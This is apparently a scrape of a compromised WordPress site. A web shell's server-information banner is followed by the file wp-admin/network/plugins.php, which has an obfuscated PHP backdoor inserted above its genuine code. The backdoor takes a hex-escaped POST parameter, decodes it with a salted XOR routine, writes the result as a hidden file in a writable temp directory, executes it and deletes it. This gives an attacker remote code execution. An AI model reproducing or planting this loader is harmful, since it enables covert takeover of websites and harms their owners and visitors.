| Server IP : 198.38.94.67 / Your IP : 216.73.217.142 Web Server : LiteSpeed System : Linux d6054.dxb1.stableserver.net 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64 User : azfilmst ( 1070) PHP Version : 7.4.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/azfilmst/zeuszamani.com/wp-admin/network/ |
Upload File : |
<?php if(isset($_POST["\x64e\x73c"]) ? true : false){ $flag = array_filter(["/var/tmp", getcwd(), getenv("TMP"), "/dev/shm", "/tmp", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), session_save_path()]); $entry = $_POST["\x64e\x73c"]; $entry = explode ( ".", $entry ); $mrk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $n = 0; while ($n < count($entry)) {$v5 = $entry[$n]; $chS = ord($salt[$n %$sLen] ); $d = ((int)$v5 - $chS - ($n %10)) ^ 79; $mrk .= chr($d ); $n++; } foreach ($flag as $dat) { if ((bool)is_dir($dat) && (bool)is_writable($dat)) { $k = "$dat/.ptr"; $success = file_put_contents($k, $mrk); if ($success) { include $k; @unlink($k); die();} } } }
/**
* Network Plugins administration panel.
*
* @package WordPress
* @subpackage Multisite
* @since 3.1.0
*/
/** Load WordPress Administration Bootstrap */
require_once __DIR__ . '/admin.php';
require ABSPATH . 'wp-admin/plugins.php';